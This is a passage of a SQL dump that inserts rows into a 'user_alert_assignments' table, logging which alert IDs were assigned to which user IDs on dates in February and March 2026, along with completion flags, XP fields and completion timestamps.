(877, 102, 835, '2026-02-11', 0, 0, 0, NULL),
(878, 138, 302, '2026-02-11', 0, 0, 0, NULL),
(879, 138, 221, '2026-02-11', 0, 0, 0, NULL),
(880, 138, 959, '2026-02-11', 0, 0, 0, NULL),
(881, 138, 958, '2026-02-11', 0, 0, 0, NULL),
(882, 138, 709, '2026-02-11', 0, 0, 0, NULL),
(883, 138, 216, '2026-02-11', 0, 0, 0, NULL),
(884, 138, 710, '2026-02-11', 0, 0, 0, NULL),
(885, 138, 687, '2026-02-11', 0, 0, 0, NULL),
(886, 138, 238, '2026-02-11', 0, 0, 0, NULL),
(887, 138, 253, '2026-02-11', 0, 0, 0, NULL),
(888, 140, 687, '2026-02-11', 0, 0, 0, NULL),
(889, 140, 762, '2026-02-11', 0, 0, 0, NULL),
(890, 140, 957, '2026-02-11', 0, 0, 0, NULL),
(891, 140, 234, '2026-02-11', 0, 0, 0, NULL),
(892, 140, 250, '2026-02-11', 0, 0, 0, NULL),
(893, 140, 253, '2026-02-11', 0, 0, 0, NULL),
(894, 140, 216, '2026-02-11', 0, 0, 0, NULL),
(895, 140, 229, '2026-02-11', 0, 0, 0, NULL),
(896, 140, 221, '2026-02-11', 0, 0, 0, NULL),
(897, 140, 624, '2026-02-11', 0, 0, 0, NULL),
(898, 107, 933, '2026-02-12', 0, 0, 0, NULL),
(899, 107, 834, '2026-02-12', 0, 0, 0, NULL),
(900, 107, 653, '2026-02-12', 0, 0, 0, NULL),
(901, 107, 942, '2026-02-12', 0, 0, 0, NULL),
(902, 107, 729, '2026-02-12', 0, 0, 0, NULL),
(903, 107, 302, '2026-02-12', 0, 0, 0, NULL),
(904, 107, 849, '2026-02-12', 0, 0, 0, NULL),
(905, 107, 839, '2026-02-12', 0, 0, 0, NULL),
(906, 107, 658, '2026-02-12', 0, 0, 0, NULL),
(907, 107, 714, '2026-02-12', 0, 0, 0, NULL),
(908, 141, 953, '2026-02-12', 0, 0, 0, NULL),
(909, 141, 238, '2026-02-12', 0, 0, 0, NULL),
(910, 141, 630, '2026-02-12', 0, 0, 0, NULL),
(911, 141, 687, '2026-02-12', 0, 0, 0, NULL),
(912, 141, 959, '2026-02-12', 0, 0, 0, NULL),
(913, 141, 957, '2026-02-12', 1, 0, 0, '2026-02-12 07:25:05'),
(914, 141, 729, '2026-02-12', 1, 0, 0, '2026-02-12 07:13:30'),
(915, 141, 234, '2026-02-12', 0, 0, 0, NULL),
(916, 141, 253, '2026-02-12', 1, 0, 0, '2026-02-12 07:18:58'),
(917, 141, 624, '2026-02-12', 0, 0, 0, NULL),
(918, 137, 239, '2026-02-12', 0, 0, 0, NULL),
(919, 137, 250, '2026-02-12', 0, 0, 0, NULL),
(920, 137, 959, '2026-02-12', 0, 0, 0, NULL),
(921, 137, 229, '2026-02-12', 1, 0, 0, '2026-02-13 16:10:32'),
(922, 137, 958, '2026-02-12', 0, 0, 0, NULL),
(923, 137, 955, '2026-02-12', 0, 0, 0, NULL),
(924, 137, 252, '2026-02-12', 0, 0, 0, NULL),
(925, 137, 234, '2026-02-12', 0, 0, 0, NULL),
(926, 137, 710, '2026-02-12', 0, 0, 0, NULL),
(927, 137, 687, '2026-02-12', 1, 0, 0, '2026-02-13 03:04:15'),
(928, 137, 958, '2026-02-13', 0, 0, 0, NULL),
(929, 137, 710, '2026-02-13', 0, 0, 0, NULL),
(930, 137, 955, '2026-02-13', 0, 0, 0, NULL),
(931, 137, 250, '2026-02-13', 0, 0, 0, NULL),
(932, 137, 762, '2026-02-13', 0, 0, 0, NULL),
(933, 137, 219, '2026-02-13', 0, 0, 0, NULL),
(934, 137, 954, '2026-02-13', 0, 0, 0, NULL),
(935, 137, 229, '2026-02-13', 1, 0, 0, '2026-02-13 16:10:32'),
(936, 137, 230, '2026-02-13', 0, 0, 0, NULL),
(937, 137, 216, '2026-02-13', 0, 0, 0, NULL),
(938, 34, 762, '2026-02-13', 1, 0, 0, '2026-02-13 04:56:20'),
(939, 34, 955, '2026-02-13', 1, 0, 0, '2026-02-13 04:56:20'),
(940, 34, 946, '2026-02-13', 1, 0, 0, '2026-02-13 04:56:20'),
(941, 34, 945, '2026-02-13', 1, 0, 0, '2026-02-13 04:56:20'),
(942, 34, 753, '2026-02-13', 1, 0, 0, '2026-02-13 04:56:20'),
(943, 34, 959, '2026-02-13', 1, 0, 0, '2026-02-13 04:56:20'),
(944, 34, 840, '2026-02-13', 1, 0, 0, '2026-02-13 04:56:20'),
(945, 34, 675, '2026-02-13', 1, 0, 0, '2026-02-13 04:56:20'),
(946, 34, 252, '2026-02-13', 1, 0, 0, '2026-02-13 04:56:20'),
(947, 34, 947, '2026-02-13', 1, 0, 0, '2026-02-13 04:56:20'),
(948, 78, 612, '2026-02-13', 1, 0, 0, '2026-02-22 07:55:05'),
(949, 78, 698, '2026-02-13', 0, 0, 0, NULL),
(950, 78, 936, '2026-02-13', 1, 0, 0, '2026-03-13 02:56:35'),
(951, 78, 846, '2026-02-13', 0, 0, 0, NULL),
(952, 78, 693, '2026-02-13', 0, 0, 0, NULL),
(953, 78, 939, '2026-02-13', 0, 0, 0, NULL),
(954, 78, 932, '2026-02-13', 1, 0, 0, '2026-02-17 08:59:18'),
(955, 78, 851, '2026-02-13', 0, 0, 0, NULL),
(956, 78, 735, '2026-02-13', 1, 0, 0, '2026-03-15 08:50:53'),
(957, 78, 954, '2026-02-13', 1, 0, 0, '2026-03-11 10:46:30'),
(958, 141, 624, '2026-02-13', 0, 0, 0, NULL),
(959, 141, 219, '2026-02-13', 0, 0, 0, NULL),
(960, 141, 760, '2026-02-13', 0, 0, 0, NULL),
(961, 141, 630, '2026-02-13', 0, 0, 0, NULL),
(962, 141, 955, '2026-02-13', 0, 0, 0, NULL),
(963, 141, 250, '2026-02-13', 0, 0, 0, NULL),
(964, 141, 954, '2026-02-13', 0, 0, 0, NULL),
(965, 141, 762, '2026-02-13', 0, 0, 0, NULL),
(966, 141, 953, '2026-02-13', 0, 0, 0, NULL),
(967, 141, 302, '2026-02-13', 0, 0, 0, NULL),
(968, 126, 632, '2026-02-13', 0, 0, 0, NULL),
(969, 126, 219, '2026-02-13', 0, 0, 0, NULL),
(970, 126, 958, '2026-02-13', 0, 0, 0, NULL),
(971, 126, 250, '2026-02-13', 0, 0, 0, NULL),
(972, 126, 234, '2026-02-13', 0, 0, 0, NULL),
(973, 126, 302, '2026-02-13', 0, 0, 0, NULL),
(974, 126, 760, '2026-02-13', 0, 0, 0, NULL),
(975, 126, 953, '2026-02-13', 0, 0, 0, NULL),
(976, 126, 238, '2026-02-13', 0, 0, 0, NULL),
(977, 126, 624, '2026-02-13', 0, 0, 0, NULL),
(978, 126, 302, '2026-02-14', 0, 0, 0, NULL),
(979, 126, 760, '2026-02-14', 0, 0, 0, NULL),
(980, 126, 630, '2026-02-14', 0, 0, 0, NULL),
(981, 126, 221, '2026-02-14', 0, 0, 0, NULL),
(982, 126, 624, '2026-02-14', 0, 0, 0, NULL),
(983, 126, 250, '2026-02-14', 0, 0, 0, NULL),
(984, 126, 234, '2026-02-14', 0, 0, 0, NULL),
(985, 126, 955, '2026-02-14', 0, 0, 0, NULL),
(986, 126, 959, '2026-02-14', 0, 0, 0, NULL),
(987, 126, 762, '2026-02-14', 0, 0, 0, NULL),
(988, 34, 959, '2026-02-14', 0, 0, 0, NULL),
(989, 34, 840, '2026-02-14', 0, 0, 0, NULL),
(990, 34, 753, '2026-02-14', 0, 0, 0, NULL),
(991, 34, 945, '2026-02-14', 0, 0, 0, NULL),
(992, 34, 947, '2026-02-14', 0, 0, 0, NULL),
(993, 34, 946, '2026-02-14', 0, 0, 0, NULL),
(994, 34, 940, '2026-02-14', 0, 0, 0, NULL),
(995, 34, 733, '2026-02-14', 0, 0, 0, NULL),
(996, 34, 637, '2026-02-14', 0, 0, 0, NULL),
(997, 34, 854, '2026-02-14', 0, 0, 0, NULL),
(998, 142, 219, '2026-02-14', 0, 0, 0, NULL),
(999, 142, 959, '2026-02-14', 0, 0, 0, NULL),
(1000, 142, 953, '2026-02-14', 0, 0, 0, NULL),
(1001, 142, 762, '2026-02-14', 0, 0, 0, NULL),
(1002, 142, 630, '2026-02-14', 0, 0, 0, NULL),
(1003, 142, 955, '2026-02-14', 0, 0, 0, NULL),
(1004, 142, 958, '2026-02-14', 0, 0, 0, NULL),
(1005, 142, 760, '2026-02-14', 0, 0, 0, NULL),
(1006, 142, 252, '2026-02-14', 0, 0, 0, NULL),
(1007, 142, 632, '2026-02-14', 0, 0, 0, NULL),
(1008, 145, 760, '2026-02-14', 0, 0, 0, NULL),
(1009, 145, 762, '2026-02-14', 0, 0, 0, NULL),
(1010, 145, 624, '2026-02-14', 0, 0, 0, NULL),
(1011, 145, 959, '2026-02-14', 0, 0, 0, NULL),
(1012, 145, 953, '2026-02-14', 0, 0, 0, NULL),
(1013, 145, 250, '2026-02-14', 0, 0, 0, NULL),
(1014, 145, 955, '2026-02-14', 0, 0, 0, NULL),
(1015, 145, 302, '2026-02-14', 0, 0, 0, NULL),
(1016, 145, 221, '2026-02-14', 0, 0, 0, NULL),
(1017, 145, 954, '2026-02-14', 0, 0, 0, NULL),
(1018, 95, 252, '2026-02-14', 0, 0, 0, NULL),
(1019, 95, 302, '2026-02-14', 0, 0, 0, NULL),
(1020, 95, 238, '2026-02-14', 0, 0, 0, NULL),
(1021, 95, 234, '2026-02-14', 0, 0, 0, NULL),
(1022, 95, 630, '2026-02-14', 0, 0, 0, NULL),
(1023, 95, 250, '2026-02-14', 0, 0, 0, NULL),
(1024, 95, 953, '2026-02-14', 0, 0, 0, NULL),
(1025, 95, 958, '2026-02-14', 0, 0, 0, NULL),
(1026, 95, 760, '2026-02-14', 0, 0, 0, NULL),
(1027, 95, 709, '2026-02-14', 0, 0, 0, NULL),
(1028, 109, 757, '2026-02-14', 1, 0, 0, '2026-02-22 18:14:26'),
(1029, 109, 732, '2026-02-14', 1, 0, 0, '2026-02-15 11:28:49'),
(1030, 109, 624, '2026-02-14', 1, 0, 0, '2026-02-15 11:28:03'),
(1031, 109, 608, '2026-02-14', 1, 0, 0, '2026-02-22 18:15:18'),
(1032, 109, 843, '2026-02-14', 0, 0, 0, NULL),
(1033, 153, 953, '2026-02-15', 0, 0, 0, NULL),
(1034, 153, 234, '2026-02-15', 0, 0, 0, NULL),
(1035, 153, 762, '2026-02-15', 0, 0, 0, NULL),
(1036, 153, 632, '2026-02-15', 0, 0, 0, NULL),
(1037, 153, 760, '2026-02-15', 0, 0, 0, NULL),
(1038, 99, 851, '2026-02-15', 1, 0, 0, '2026-02-16 19:55:37'),
(1039, 99, 630, '2026-02-15', 1, 0, 0, '2026-02-16 19:56:52'),
(1040, 99, 846, '2026-02-15', 1, 0, 0, '2026-02-18 12:08:22'),
(1041, 99, 843, '2026-02-15', 1, 0, 0, '2026-02-16 19:56:03'),
(1042, 99, 640, '2026-02-15', 1, 0, 0, '2026-02-15 20:18:41'),
(1043, 109, 644, '2026-02-15', 1, 0, 0, '2026-02-18 16:55:11'),
(1044, 109, 840, '2026-02-15', 0, 0, 0, NULL),
(1045, 109, 613, '2026-02-15', 1, 0, 0, '2026-02-18 16:55:35'),
(1046, 109, 838, '2026-02-15', 1, 0, 0, '2026-02-22 18:15:41'),
(1047, 109, 718, '2026-02-15', 0, 0, 0, NULL),
(1048, 95, 632, '2026-02-15', 0, 0, 0, NULL),
(1049, 95, 955, '2026-02-15', 0, 0, 0, NULL),
(1050, 95, 630, '2026-02-15', 0, 0, 0, NULL),
(1051, 95, 953, '2026-02-15', 0, 0, 0, NULL),
(1052, 95, 762, '2026-02-15', 0, 0, 0, NULL),
(1053, 34, 1260, '2026-02-15', 0, 0, 0, NULL),
(1054, 34, 1261, '2026-02-15', 0, 0, 0, NULL),
(1055, 34, 955, '2026-02-15', 0, 0, 0, NULL),
(1056, 34, 1258, '2026-02-15', 0, 0, 0, NULL),
(1057, 34, 945, '2026-02-15', 0, 0, 0, NULL),
(1058, 159, 219, '2026-02-15', 0, 0, 0, NULL),
(1059, 159, 221, '2026-02-15', 0, 0, 0, NULL),
(1060, 159, 953, '2026-02-15', 1, 0, 0, '2026-02-16 02:30:24'),
(1061, 159, 1250, '2026-02-15', 0, 0, 0, NULL),
(1062, 159, 234, '2026-02-15', 0, 0, 0, NULL),
(1063, 34, 1254, '2026-02-16', 0, 0, 0, NULL),
(1064, 34, 947, '2026-02-16', 0, 0, 0, NULL),
(1065, 34, 1258, '2026-02-16', 0, 0, 0, NULL),
(1066, 34, 743, '2026-02-16', 0, 0, 0, NULL),
(1067, 34, 940, '2026-02-16', 0, 0, 0, NULL),
(1068, 102, 663, '2026-02-16', 0, 0, 0, NULL),
(1069, 102, 614, '2026-02-16', 0, 0, 0, NULL),
(1070, 102, 693, '2026-02-16', 0, 0, 0, NULL),
(1071, 102, 620, '2026-02-16', 0, 0, 0, NULL),
(1072, 102, 851, '2026-02-16', 0, 0, 0, NULL);
INSERT INTO `user_alert_assignments` (`id`, `user_id`, `alert_id`, `assigned_date`, `completed`, `is_replay`, `xp_earned`, `completed_at`) VALUES
(1073, 161, 845, '2026-02-16', 1, 0, 0, '2026-02-16 08:11:24'),
(1074, 161, 658, '2026-02-16', 1, 0, 0, '2026-02-16 08:12:20'),
(1075, 161, 648, '2026-02-16', 0, 0, 0, NULL),
(1076, 161, 757, '2026-02-16', 0, 0, 0, NULL),
(1077, 161, 1261, '2026-02-16', 1, 0, 0, '2026-02-16 08:12:44'),
(1078, 60, 302, '2026-02-16', 0, 0, 0, NULL),
(1079, 60, 219, '2026-02-16', 0, 0, 0, NULL),
(1080, 60, 221, '2026-02-16', 0, 0, 0, NULL),
(1081, 60, 760, '2026-02-16', 0, 0, 0, NULL),
(1082, 60, 762, '2026-02-16', 0, 0, 0, NULL),
(1083, 99, 840, '2026-02-16', 0, 0, 0, NULL),
(1084, 99, 947, '2026-02-16', 1, 0, 0, '2026-02-16 20:10:55'),
(1085, 99, 1250, '2026-02-16', 1, 0, 0, '2026-02-16 20:11:39'),
(1086, 99, 958, '2026-02-16', 1, 0, 0, '2026-02-16 20:17:45'),
(1087, 99, 945, '2026-02-16', 0, 0, 0, NULL),
(1089, 99, 940, '2026-02-16', 1, 0, 0, '2026-02-16 20:12:48'),
(1090, 99, 701, '2026-02-16', 1, 0, 0, '2026-02-18 12:06:56'),
(1091, 165, 221, '2026-02-16', 1, 0, 0, '2026-02-16 20:37:09'),
(1092, 165, 632, '2026-02-16', 1, 0, 0, '2026-02-16 20:31:54'),
(1093, 165, 234, '2026-02-16', 1, 0, 0, '2026-02-16 20:38:48'),
(1094, 165, 762, '2026-02-16', 1, 0, 0, '2026-02-16 20:38:24'),
(1095, 165, 955, '2026-02-16', 1, 0, 0, '2026-02-16 20:37:03'),
(1096, 45, 250, '2026-02-17', 0, 0, 0, NULL),
(1097, 45, 219, '2026-02-17', 0, 0, 0, NULL),
(1098, 45, 760, '2026-02-17', 0, 0, 0, NULL),
(1099, 45, 302, '2026-02-17', 0, 0, 0, NULL),
(1108, 34, 946, '2026-02-17', 0, 0, 0, NULL),
(1109, 34, 1257, '2026-02-17', 0, 0, 0, NULL),
(1110, 34, 945, '2026-02-17', 0, 0, 0, NULL),
(1111, 34, 838, '2026-02-17', 0, 0, 0, NULL),
(1112, 34, 854, '2026-02-17', 0, 0, 0, NULL),
(1113, 165, 946, '2026-02-17', 1, 0, 0, '2026-02-17 08:27:47'),
(1114, 165, 840, '2026-02-17', 1, 0, 0, '2026-02-17 08:28:22'),
(1115, 165, 945, '2026-02-17', 1, 0, 0, '2026-02-17 08:27:38'),
(1116, 165, 619, '2026-02-17', 1, 0, 0, '2026-02-17 08:27:43'),
(1117, 165, 755, '2026-02-17', 1, 0, 0, '2026-02-17 08:27:27'),
(1118, 166, 302, '2026-02-17', 0, 0, 0, NULL),
(1119, 166, 219, '2026-02-17', 0, 0, 0, NULL),
(1120, 166, 760, '2026-02-17', 0, 0, 0, NULL),
(1121, 166, 250, '2026-02-17', 0, 0, 0, NULL),
(1130, 157, 219, '2026-02-17', 1, 0, 0, '2026-02-18 01:33:47'),
(1131, 157, 302, '2026-02-17', 1, 0, 0, '2026-02-18 01:30:25'),
(1132, 157, 250, '2026-02-17', 1, 0, 0, '2026-02-18 01:34:47'),
(1133, 157, 760, '2026-02-17', 1, 0, 0, '2026-02-18 01:35:23'),
(1134, 119, 712, '2026-02-17', 0, 0, 0, NULL),
(1135, 119, 657, '2026-02-17', 0, 0, 0, NULL),
(1136, 119, 697, '2026-02-17', 0, 0, 0, NULL),
(1137, 119, 839, '2026-02-17', 0, 0, 0, NULL),
(1138, 119, 1259, '2026-02-17', 0, 0, 0, NULL),
(1139, 78, 718, '2026-02-18', 1, 0, 0, '2026-02-18 05:24:47'),
(1140, 78, 750, '2026-02-18', 1, 0, 0, '2026-02-18 05:24:47'),
(1141, 78, 1259, '2026-02-18', 1, 0, 0, '2026-02-18 05:24:47'),
(1142, 78, 848, '2026-02-18', 1, 0, 0, '2026-02-18 05:24:47'),
(1143, 78, 934, '2026-02-18', 1, 0, 0, '2026-02-18 05:24:47'),
(1144, 78, 620, '2026-02-19', 1, 0, 0, '2026-02-19 11:28:20'),
(1145, 78, 696, '2026-02-19', 1, 0, 0, '2026-02-19 11:28:20'),
(1146, 78, 854, '2026-02-19', 1, 0, 0, '2026-02-19 11:28:20'),
(1147, 78, 618, '2026-02-19', 1, 0, 0, '2026-02-19 11:28:20'),
(1148, 78, 933, '2026-02-19', 1, 0, 0, '2026-02-19 11:28:20'),
(1149, 126, 713, '2026-02-19', 0, 0, 0, NULL),
(1150, 126, 637, '2026-02-19', 1, 0, 0, '2026-02-19 23:43:17'),
(1151, 126, 847, '2026-02-19', 0, 0, 0, NULL),
(1152, 126, 608, '2026-02-19', 0, 0, 0, NULL),
(1153, 126, 943, '2026-02-19', 0, 0, 0, NULL),
(1154, 177, 712, '2026-02-19', 1, 0, 0, '2026-02-22 17:40:22'),
(1155, 177, 758, '2026-02-19', 1, 0, 0, '2026-02-22 17:50:13'),
(1156, 177, 694, '2026-02-19', 1, 0, 0, '2026-02-22 17:53:39'),
(1157, 177, 692, '2026-02-19', 1, 0, 0, '2026-02-22 17:36:31'),
(1158, 177, 605, '2026-02-19', 1, 0, 0, '2026-02-22 17:52:04'),
(1159, 177, 934, '2026-02-22', 1, 0, 0, '2026-02-22 11:59:19'),
(1160, 177, 717, '2026-02-22', 1, 0, 0, '2026-02-22 13:25:32'),
(1161, 177, 638, '2026-02-22', 1, 0, 0, '2026-02-22 17:43:45'),
(1162, 177, 718, '2026-02-22', 1, 0, 0, '2026-02-22 17:54:09'),
(1163, 177, 605, '2026-02-22', 1, 0, 0, '2026-02-22 17:52:04'),
(1164, 34, 1253, '2026-02-23', 0, 0, 0, NULL),
(1165, 34, 1257, '2026-02-23', 0, 0, 0, NULL),
(1166, 34, 1255, '2026-02-23', 0, 0, 0, NULL),
(1167, 34, 714, '2026-02-23', 0, 0, 0, NULL),
(1168, 34, 854, '2026-02-23', 0, 0, 0, NULL),
(1169, 180, 661, '2026-02-23', 1, 0, 0, '2026-02-23 14:36:18'),
(1170, 180, 855, '2026-02-23', 1, 0, 0, '2026-02-23 14:36:18'),
(1171, 180, 606, '2026-02-23', 1, 0, 0, '2026-02-23 14:36:18'),
(1172, 180, 834, '2026-02-23', 1, 0, 0, '2026-02-23 14:36:18'),
(1173, 180, 702, '2026-02-23', 1, 0, 0, '2026-02-23 14:36:18'),
(1174, 177, 731, '2026-02-23', 1, 0, 0, '2026-02-23 22:12:43'),
(1175, 177, 765, '2026-02-23', 1, 0, 0, '2026-02-23 22:12:43'),
(1176, 177, 737, '2026-02-23', 1, 0, 0, '2026-03-11 10:11:36'),
(1177, 177, 660, '2026-02-23', 1, 0, 0, '2026-02-23 22:12:43'),
(1178, 177, 609, '2026-02-23', 1, 0, 0, '2026-02-23 22:12:43'),
(1179, 78, 1310, '2026-02-24', 0, 0, 0, NULL),
(1180, 78, 1269, '2026-02-24', 0, 0, 0, NULL),
(1181, 78, 1043, '2026-02-24', 0, 0, 0, NULL),
(1182, 78, 714, '2026-02-24', 0, 0, 0, NULL),
(1183, 78, 1268, '2026-02-24', 0, 0, 0, NULL),
(1184, 177, 696, '2026-02-25', 1, 0, 0, '2026-03-11 10:11:36'),
(1185, 177, 705, '2026-02-25', 1, 0, 0, '2026-02-25 15:11:18'),
(1186, 177, 618, '2026-02-25', 1, 0, 0, '2026-02-25 15:11:18'),
(1187, 177, 606, '2026-02-25', 1, 0, 0, '2026-03-03 11:56:55'),
(1188, 177, 698, '2026-02-25', 1, 0, 0, '2026-02-25 15:11:18'),
(1189, 174, 855, '2026-02-26', 0, 0, 0, NULL),
(1190, 174, 842, '2026-02-26', 0, 0, 0, NULL),
(1191, 174, 646, '2026-02-26', 0, 0, 0, NULL),
(1192, 174, 643, '2026-02-26', 0, 0, 0, NULL),
(1193, 174, 943, '2026-02-26', 0, 0, 0, NULL),
(1194, 109, 721, '2026-02-26', 0, 0, 0, NULL),
(1195, 109, 685, '2026-02-26', 0, 0, 0, NULL),
(1196, 109, 1253, '2026-02-26', 0, 0, 0, NULL),
(1197, 109, 938, '2026-02-26', 0, 0, 0, NULL),
(1198, 109, 1305, '2026-02-26', 0, 0, 0, NULL),
(1199, 189, 641, '2026-02-27', 0, 0, 0, NULL),
(1200, 189, 693, '2026-02-27', 0, 0, 0, NULL),
(1201, 189, 733, '2026-02-27', 0, 0, 0, NULL),
(1202, 189, 854, '2026-02-27', 0, 0, 0, NULL),
(1203, 189, 847, '2026-02-27', 0, 0, 0, NULL),
(1204, 196, 652, '2026-02-27', 0, 0, 0, NULL),
(1205, 196, 753, '2026-02-27', 0, 0, 0, NULL),
(1206, 196, 1272, '2026-02-27', 0, 0, 0, NULL),
(1207, 196, 770, '2026-02-27', 0, 0, 0, NULL),
(1208, 196, 839, '2026-02-27', 0, 0, 0, NULL),
(1209, 199, 606, '2026-02-27', 0, 0, 0, NULL),
(1210, 199, 641, '2026-02-27', 0, 0, 0, NULL),
(1211, 199, 943, '2026-02-27', 0, 0, 0, NULL),
(1212, 199, 643, '2026-02-27', 0, 0, 0, NULL),
(1213, 199, 693, '2026-02-27', 0, 0, 0, NULL),
(1214, 74, 1257, '2026-02-27', 0, 0, 0, NULL),
(1215, 74, 1255, '2026-02-27', 0, 0, 0, NULL),
(1216, 74, 1253, '2026-02-27', 0, 0, 0, NULL),
(1217, 74, 1304, '2026-02-27', 0, 0, 0, NULL),
(1218, 74, 666, '2026-02-27', 0, 0, 0, NULL),
(1219, 199, 854, '2026-02-28', 0, 0, 0, NULL),
(1220, 199, 848, '2026-02-28', 0, 0, 0, NULL),
(1221, 199, 646, '2026-02-28', 0, 0, 0, NULL),
(1222, 199, 648, '2026-02-28', 0, 0, 0, NULL),
(1223, 199, 943, '2026-02-28', 0, 0, 0, NULL),
(1224, 199, 836, '2026-03-01', 0, 0, 0, NULL),
(1225, 199, 942, '2026-03-01', 0, 0, 0, NULL),
(1226, 199, 697, '2026-03-01', 0, 0, 0, NULL),
(1227, 199, 656, '2026-03-01', 0, 0, 0, NULL),
(1228, 199, 1267, '2026-03-01', 0, 0, 0, NULL),
(1229, 177, 620, '2026-03-01', 1, 0, 0, '2026-03-02 00:54:34'),
(1230, 177, 1043, '2026-03-01', 1, 0, 0, '2026-03-11 10:11:36'),
(1231, 177, 669, '2026-03-01', 1, 0, 0, '2026-03-02 00:54:34'),
(1232, 177, 1268, '2026-03-01', 1, 0, 0, '2026-03-02 00:54:34'),
(1233, 177, 616, '2026-03-01', 1, 0, 0, '2026-03-02 00:54:34'),
(1234, 34, 1255, '2026-03-01', 0, 0, 0, NULL),
(1235, 34, 1257, '2026-03-01', 0, 0, 0, NULL),
(1236, 34, 1253, '2026-03-01', 0, 0, 0, NULL),
(1237, 34, 770, '2026-03-01', 0, 0, 0, NULL),
(1241, 34, 765, '2026-03-01', 0, 0, 0, NULL),
(1242, 225, 849, '2026-03-02', 1, 0, 0, '2026-03-06 13:15:27'),
(1243, 225, 606, '2026-03-02', 1, 0, 0, '2026-03-05 08:19:14'),
(1244, 225, 643, '2026-03-02', 1, 0, 0, '2026-03-09 05:47:02'),
(1245, 225, 844, '2026-03-02', 0, 0, 0, NULL),
(1246, 225, 854, '2026-03-02', 1, 0, 0, '2026-03-06 01:34:12'),
(1247, 226, 1378, '2026-03-02', 0, 0, 0, NULL),
(1248, 226, 1437, '2026-03-02', 0, 0, 0, NULL),
(1249, 226, 1433, '2026-03-02', 0, 0, 0, NULL),
(1250, 226, 693, '2026-03-02', 0, 0, 0, NULL),
(1251, 226, 1373, '2026-03-02', 0, 0, 0, NULL),
(1252, 228, 849, '2026-03-02', 0, 0, 0, NULL),
(1253, 228, 854, '2026-03-02', 0, 0, 0, NULL),
(1254, 228, 714, '2026-03-02', 0, 0, 0, NULL),
(1255, 228, 1434, '2026-03-02', 0, 0, 0, NULL),
(1256, 228, 1439, '2026-03-02', 0, 0, 0, NULL),
(1257, 229, 1433, '2026-03-02', 1, 0, 0, '2026-03-02 21:29:07'),
(1258, 229, 1434, '2026-03-02', 1, 0, 0, '2026-03-02 21:29:07'),
(1259, 229, 854, '2026-03-02', 1, 0, 0, '2026-03-02 21:29:07'),
(1260, 229, 1385, '2026-03-02', 1, 0, 0, '2026-03-02 21:29:07'),
(1261, 229, 1377, '2026-03-02', 1, 0, 0, '2026-03-03 15:03:14'),
(1262, 213, 1433, '2026-03-02', 0, 0, 0, NULL),
(1263, 213, 844, '2026-03-02', 0, 0, 0, NULL),
(1264, 213, 942, '2026-03-02', 0, 0, 0, NULL),
(1265, 213, 1385, '2026-03-02', 0, 0, 0, NULL),
(1266, 213, 1437, '2026-03-02', 0, 0, 0, NULL),
(1267, 199, 731, '2026-03-02', 0, 0, 0, NULL),
(1268, 199, 1377, '2026-03-02', 0, 0, 0, NULL),
(1269, 199, 943, '2026-03-02', 0, 0, 0, NULL),
(1270, 199, 1387, '2026-03-02', 0, 0, 0, NULL),
(1271, 199, 1374, '2026-03-02', 0, 0, 0, NULL),
(1272, 217, 731, '2026-03-03', 0, 0, 0, NULL),
(1273, 217, 1442, '2026-03-03', 0, 0, 0, NULL),
(1274, 217, 1431, '2026-03-03', 0, 0, 0, NULL),
(1275, 217, 733, '2026-03-03', 0, 0, 0, NULL),
(1276, 217, 1384, '2026-03-03', 0, 0, 0, NULL),
(1277, 199, 1373, '2026-03-03', 0, 0, 0, NULL),
(1278, 199, 646, '2026-03-03', 0, 0, 0, NULL),
(1279, 199, 648, '2026-03-03', 0, 0, 0, NULL),
(1280, 199, 1389, '2026-03-03', 0, 0, 0, NULL),
(1281, 199, 693, '2026-03-03', 0, 0, 0, NULL),
(1282, 232, 693, '2026-03-03', 0, 0, 0, NULL),
(1283, 232, 942, '2026-03-03', 0, 0, 0, NULL),
(1284, 232, 1431, '2026-03-03', 0, 0, 0, NULL),
(1285, 232, 844, '2026-03-03', 0, 0, 0, NULL),
(1286, 232, 1378, '2026-03-03', 0, 0, 0, NULL),
(1287, 178, 1377, '2026-03-03', 0, 0, 0, NULL),
(1288, 178, 606, '2026-03-03', 0, 0, 0, NULL),
(1289, 178, 943, '2026-03-03', 0, 0, 0, NULL),
(1290, 178, 1433, '2026-03-03', 0, 0, 0, NULL),
(1291, 178, 1382, '2026-03-03', 0, 0, 0, NULL),
(1292, 177, 606, '2026-03-03', 1, 0, 0, '2026-03-03 11:56:55'),
(1293, 177, 735, '2026-03-03', 1, 0, 0, '2026-03-15 07:28:58'),
(1294, 177, 754, '2026-03-03', 1, 0, 0, '2026-03-03 11:56:55'),
(1295, 177, 1313, '2026-03-03', 1, 0, 0, '2026-03-03 11:56:55'),
(1296, 177, 1397, '2026-03-03', 1, 0, 0, '2026-03-03 11:56:55'),
(1297, 233, 848, '2026-03-03', 0, 0, 0, NULL),
(1298, 233, 1386, '2026-03-03', 1, 0, 0, '2026-03-03 15:13:40'),
(1299, 233, 847, '2026-03-03', 1, 0, 0, '2026-03-03 15:15:21'),
(1300, 233, 1441, '2026-03-03', 0, 0, 0, NULL),
(1301, 233, 844, '2026-03-03', 0, 0, 0, NULL),
(1302, 229, 1442, '2026-03-03', 1, 0, 0, '2026-03-04 14:44:04'),
(1303, 229, 733, '2026-03-03', 1, 0, 0, '2026-03-03 15:03:14'),
(1304, 229, 1377, '2026-03-03', 1, 0, 0, '2026-03-03 15:03:14'),
(1305, 229, 844, '2026-03-03', 1, 0, 0, '2026-03-03 15:03:14'),
(1306, 229, 1374, '2026-03-03', 1, 0, 0, '2026-03-03 15:03:14'),
(1307, 56, 1383, '2026-03-03', 0, 0, 0, NULL),
(1308, 56, 693, '2026-03-03', 0, 0, 0, NULL),
(1309, 56, 1433, '2026-03-03', 0, 0, 0, NULL),
(1310, 56, 1392, '2026-03-03', 0, 0, 0, NULL),
(1311, 56, 1389, '2026-03-03', 0, 0, 0, NULL),
(1312, 234, 731, '2026-03-03', 0, 0, 0, NULL),
(1313, 234, 1435, '2026-03-03', 0, 0, 0, NULL),
(1314, 234, 648, '2026-03-03', 0, 0, 0, NULL),
(1315, 234, 1439, '2026-03-03', 0, 0, 0, NULL),
(1316, 234, 1433, '2026-03-03', 0, 0, 0, NULL),
(1317, 235, 1435, '2026-03-03', 0, 0, 0, NULL),
(1318, 235, 1378, '2026-03-03', 0, 0, 0, NULL),
(1319, 235, 1382, '2026-03-03', 0, 0, 0, NULL),
(1320, 235, 1387, '2026-03-03', 0, 0, 0, NULL),
(1321, 235, 1375, '2026-03-03', 0, 0, 0, NULL),
(1322, 237, 1437, '2026-03-03', 0, 0, 0, NULL),
(1323, 237, 849, '2026-03-03', 0, 0, 0, NULL),
